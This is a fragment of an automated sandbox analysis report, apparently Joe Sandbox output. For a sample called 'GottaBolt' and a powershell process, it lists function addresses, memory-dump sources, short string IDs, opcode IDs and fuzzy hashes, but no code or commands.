                                                                          control_flow_graph 126 7ffaaccce692-7ffaacccecdf 129 7ffaacccece9-7ffaaccced1b LoadLibraryExW 126->129 130 7ffaacccece1-7ffaacccece6 126->130 131 7ffaaccced23-7ffaaccced4a 129->131 132 7ffaaccced1d 129->132 130->129 132->131
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 5a947568b967126cdd20d17f062870468b343901ec90a0b97a8d10dad17e324c
                                                                          • Instruction ID: 02f249b982b502d7f5efbf45aed0b7aee252520105cf17af11ec0504a8b3f983
                                                                          • Opcode Fuzzy Hash: 5a947568b967126cdd20d17f062870468b343901ec90a0b97a8d10dad17e324c
                                                                          • Instruction Fuzzy Hash: F6217C71908A1C9FDB58DF98D449AE9BBE0FF69321F00822ED01ED3651DB70A8058B81

                                                                          Non-executed Functions

                                                                          Function 00007FFAACCD00E7 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5{A$_
                                                                          • API String ID: 0-2574668834
                                                                          • Opcode ID: 42555f7198a54b505cfd68b49fb1368825b8ea73f22f5bd6466bfbddb1c221b5
                                                                          • Instruction ID: f63b07eddb498de82b9880e3c9e2629435d784f82a2d233cdbbeed4fb9bae904
                                                                          • Opcode Fuzzy Hash: 42555f7198a54b505cfd68b49fb1368825b8ea73f22f5bd6466bfbddb1c221b5
                                                                          • Instruction Fuzzy Hash: 81C1A8A771956A8AE201BB7DF8495FCBB90DF8233670853F7D28CCD093DE15944A82D4
                                                                          Function 00007FFAACCD00CF Relevance: 3.0, Strings: 2, Instructions: 468COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5{A$_
                                                                          • API String ID: 0-2574668834
                                                                          • Opcode ID: 286c9050b03a57a6ef5928fae7ae6a0f583bf984797190c2f74f255fecc63393
                                                                          • Instruction ID: 4cebeac3fda1d1eaa924a47c34b9bfdae1e6d78ef139085201166785e5859f6c
                                                                          • Opcode Fuzzy Hash: 286c9050b03a57a6ef5928fae7ae6a0f583bf984797190c2f74f255fecc63393
                                                                          • Instruction Fuzzy Hash: 32C1959771956A8AE201BB7DF8895FCBB90DF8233670853F7D28CCD093DE05944A82E4
                                                                          Function 00007FFAACCD01FA Relevance: 2.9, Strings: 2, Instructions: 372COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5{A$BM_^
                                                                          • API String ID: 0-3371740133
                                                                          • Opcode ID: c1b35a62abc62213001f69719fcbd819924f2e463008883653f73b3c0260d4e9
                                                                          • Instruction ID: af6f4fb12056b7a6e7d346a2b74dff3daa3cf9c97925d1211395ca2e85baf49c
                                                                          • Opcode Fuzzy Hash: c1b35a62abc62213001f69719fcbd819924f2e463008883653f73b3c0260d4e9
                                                                          • Instruction Fuzzy Hash: A491A69771956A49E201BA7DF8495FCBB90DF8237670893F7D28CCD0939F05644B82E8
                                                                          Function 00007FFAACCCD329 Relevance: 1.8, Strings: 1, Instructions: 509COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _
                                                                          • API String ID: 0-701932520
                                                                          • Opcode ID: 4f85a7e10d1e78b88786f76ca971e3a55fad2f371f8d4ae845701f05ac315883
                                                                          • Instruction ID: 22b0c516d95252833d4521c25b5ec88b296bcc46dff1fc5b3d80bdc92ec03791
                                                                          • Opcode Fuzzy Hash: 4f85a7e10d1e78b88786f76ca971e3a55fad2f371f8d4ae845701f05ac315883
                                                                          • Instruction Fuzzy Hash: A2F1B382A1FFC1CBF26B471C28162356F90EB9322570C87FBE04D4B5DF5959DA1A82D2
                                                                          Function 00007FFAACCD01D3 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5{A
                                                                          • API String ID: 0-175539463
                                                                          • Opcode ID: 1af73dbeb080e073dd8f6079e3dd20d6b92cd650899497ff4f448d364657d824
                                                                          • Instruction ID: 65cb8f8d4511bae9dd9b62d7071bd90bf6b93e519d48cff77a5a2667d991fd75
                                                                          • Opcode Fuzzy Hash: 1af73dbeb080e073dd8f6079e3dd20d6b92cd650899497ff4f448d364657d824
                                                                          • Instruction Fuzzy Hash: EE91975771956A49E201BA7DF8495FCBB90DF8233670493F7D38CCD0839F15A48A86E8

                                                                          Executed Functions

                                                                          Function 00007FFAACD936AA Relevance: .4, Instructions: 410COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450618034.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacd90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c4f243f739477987a5f772865f27b9ed2338c9c31c8c1b5ea86d33c1b3e69b8
                                                                          • Instruction ID: 0f27f74451afcd809960384e48d54bdd9e170a5a747a170012c0e603b7a98ec6
                                                                          • Opcode Fuzzy Hash: 4c4f243f739477987a5f772865f27b9ed2338c9c31c8c1b5ea86d33c1b3e69b8
                                                                          • Instruction Fuzzy Hash: 14C11766A0EB855FF356972C98152747BE1EF47220B0841FBD05DC7693EE1DEC0A8392
                                                                          Function 00007FFAACD93B20 Relevance: .1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450618034.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacd90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a28fd6789db9eb81e71781816adb73c48c307dffbab945ea1590412527672f7
                                                                          • Instruction ID: e74126c04eaa8fe20fcc7760df54df6b43e67669210dc23e8a7fd7bfdfd87cb7
                                                                          • Opcode Fuzzy Hash: 5a28fd6789db9eb81e71781816adb73c48c307dffbab945ea1590412527672f7
                                                                          • Instruction Fuzzy Hash: 82414532B0DA898FF7A5972CD8456B4BBD1EF42324B4800BAD05EC7683F919EC0983C0
                                                                          Function 00007FFAACBAE2A0 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1449459440.00007FFAACBAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBAD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacbad000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d71e0f21c580170f7bacb2e1ca7063bd031e013d0cf2327a63e188d1fae2dc8b
                                                                          • Instruction ID: 26157bd4635d94c75236ee9125fbcdf4344541bd3826725f0661e0cac582ad87
                                                                          • Opcode Fuzzy Hash: d71e0f21c580170f7bacb2e1ca7063bd031e013d0cf2327a63e188d1fae2dc8b
                                                                          • Instruction Fuzzy Hash: A341C27180EBC48FE7568B2898459523FB0EF57320B1505EFE08CCB1A3D626E859C792
                                                                          Function 00007FFAACD93841 Relevance: .1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450618034.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacd90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c832579700f056c3e75c50909078c8ab76d7d9bab92f58c61b54fc00b0eda88d
                                                                          • Instruction ID: 3880078ee10d91fc2926473c653b1f57def56692efd64a23444cd52a49774f90
                                                                          • Opcode Fuzzy Hash: c832579700f056c3e75c50909078c8ab76d7d9bab92f58c61b54fc00b0eda88d
                                                                          • Instruction Fuzzy Hash: E2317B7AF0EA468FF3A5931C9455234B6D1EF46310B8840BAC42DC7A83FE1EEC0982C1
                                                                          Function 00007FFAACCCA1E0 Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450081522.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaaccc0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8b2ef5c9d8b6df6d826fe63ac161715f3dcc03dfef503c31960751c07a90f43
                                                                          • Instruction ID: cd3186c481671a62b5a295fb361f82a6e3019342fb28beae4122d6ee67223234
                                                                          • Opcode Fuzzy Hash: a8b2ef5c9d8b6df6d826fe63ac161715f3dcc03dfef503c31960751c07a90f43
                                                                          • Instruction Fuzzy Hash: 7331D3A380D7D68FE717AB78A86B0E57FE0EF2321574942E7D08CCE0A3EE1555188391
                                                                          Function 00007FFAACCC97C8 Relevance: .1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450081522.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaaccc0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f3df3183d8452e494342fcc527357c7b6aa1372f5a350c9afb5837ee84efc0a9
                                                                          • Instruction ID: 0e95068d867472ed4fb8935ce3aefdfc79c68bb8cdc09f7081f3ae9091ccd156
                                                                          • Opcode Fuzzy Hash: f3df3183d8452e494342fcc527357c7b6aa1372f5a350c9afb5837ee84efc0a9
                                                                          • Instruction Fuzzy Hash: CE31937191CB4C9FDB1C9F5CE84AAA97BE0FB99721F00422FE449D3251CB71A8558BC2
                                                                          Function 00007FFAACCCAB60 Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450081522.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaaccc0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73f3c1844fd68069ce1b257e5c886ed68b0600ad8d2ace65337f17f21486a5b6
                                                                          • Instruction ID: 156c22ffa7bbf200df795b12827bda413e95c12363d2dfeb4bbb0307fd08a25a
                                                                          • Opcode Fuzzy Hash: 73f3c1844fd68069ce1b257e5c886ed68b0600ad8d2ace65337f17f21486a5b6
                                                                          • Instruction Fuzzy Hash: 2921E67190CB4C8FEB58DF5CD8496E97BE0EB96321F04826FD04DC3156D670984ACB91
                                                                          Function 00007FFAACD93B6C Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450618034.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacd90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1dbc5aa492a8eca631e37dad9ce806dbfbbc8dd3e754ccca5fc722ca3e0713b
                                                                          • Instruction ID: 9876e9248c57c9697b9c25b26d8edb29c013d7455f105356fa9845de68b77b97
                                                                          • Opcode Fuzzy Hash: d1dbc5aa492a8eca631e37dad9ce806dbfbbc8dd3e754ccca5fc722ca3e0713b
                                                                          • Instruction Fuzzy Hash: 9811C476A0EA858FF6B5D72CD4545B47AD1EF03224B5840BAD05DC7A93F91EEC0883C1
                                                                          Function 00007FFAACCC3F15 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450081522.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaaccc0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b07b8adf0463457aea250cc3a6f5db45eb77b2bad8d0f8991278f28a1bc3b338
                                                                          • Instruction ID: 088398b7a8ecb5e0007e00683afa074ad46df6c0df397856f7001c699e017fa9
                                                                          • Opcode Fuzzy Hash: b07b8adf0463457aea250cc3a6f5db45eb77b2bad8d0f8991278f28a1bc3b338
                                                                          • Instruction Fuzzy Hash: 7D01447111CB088FD744EF0CE455AA6B7E0FB99364F10056DE58AC3661D726E882CB45
                                                                          Function 00007FFAACD95884 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450618034.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaacd90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f213ce5123e0d583a82cf0903332ecaeae2886934450e0419e93ec4c0cc8878c
                                                                          • Instruction ID: e821f80d67dabef7a589ae6dde492e182e399784e490807e33b81e44e7422c52
                                                                          • Opcode Fuzzy Hash: f213ce5123e0d583a82cf0903332ecaeae2886934450e0419e93ec4c0cc8878c
                                                                          • Instruction Fuzzy Hash: 05F0A73131CF044FD744EE2DD445661B3D0FBA8310F10492FE44DC3651DA25E4818782

                                                                          Non-executed Functions

                                                                          Function 00007FFAACCC044D Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1450081522.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffaaccc0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (0$8,$P/$p0$-$/
                                                                          • API String ID: 0-3999472803
                                                                          • Opcode ID: 381cba2629b9bc48410748daf51dfa3af304dad542bdfda8d2900ece50554d7a
                                                                          • Instruction ID: 4038a86a61c55f4fc6d7454b7834a9269f585f72b53de4f1a31fc564118faef3
                                                                          • Opcode Fuzzy Hash: 381cba2629b9bc48410748daf51dfa3af304dad542bdfda8d2900ece50554d7a
                                                                          • Instruction Fuzzy Hash: 4731504390F6C19FF3178BA82C661396F90AF63250B1880FBD0CC8A9DB9409DD8D83C2